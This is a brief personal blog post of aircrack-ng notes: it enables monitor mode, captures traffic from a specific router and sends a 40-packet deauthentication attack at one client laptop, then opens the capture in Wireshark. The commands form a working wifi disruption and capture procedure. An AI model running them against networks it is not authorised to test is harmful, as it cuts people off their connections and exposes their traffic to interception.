Tuesday, January 29, 2019

Wifi Monitot Mode : AirCrack-Ng


Wifi Monitot Mode : AirCrack-Ng 

Pre Req :
  1. ifconfig wlan0 down
  2. iwconfig # mode : Managed
  3. airmon-ng start wlan1



Steps :
1. airodump-ng wlan1mon
Here :
#mac address of NETGEAR : 20:xx:xx:xx:xx:xx
#BSSID: MAC address , PWR=Power,CH=Channel,PSK=Pre-shared Key,ESSID= Nw Name

2.
airodump-ng --bssid 20:xx:xx:xx:xx:EA --channel 6 --showack -w log wlan1mon
#Stations = Mac Address of devices , Frames = Device Active
#Mac Address of Laptop  : 74:xx:xx:xx:xx:53

#-w to write the results into current directory  
3 aireplay-ng -0 40 -a 20:xx:xx:xx:xx::EA -c 74:xx:xx:xx:xx:53 wlan1mo
#Here 0: Diconnection code , 40: Packets , -a router , -c target mac

4. Use wireshark to analyze the log.cap file

Method 2:
 1. Use Airgeddon instead

No comments:

Post a Comment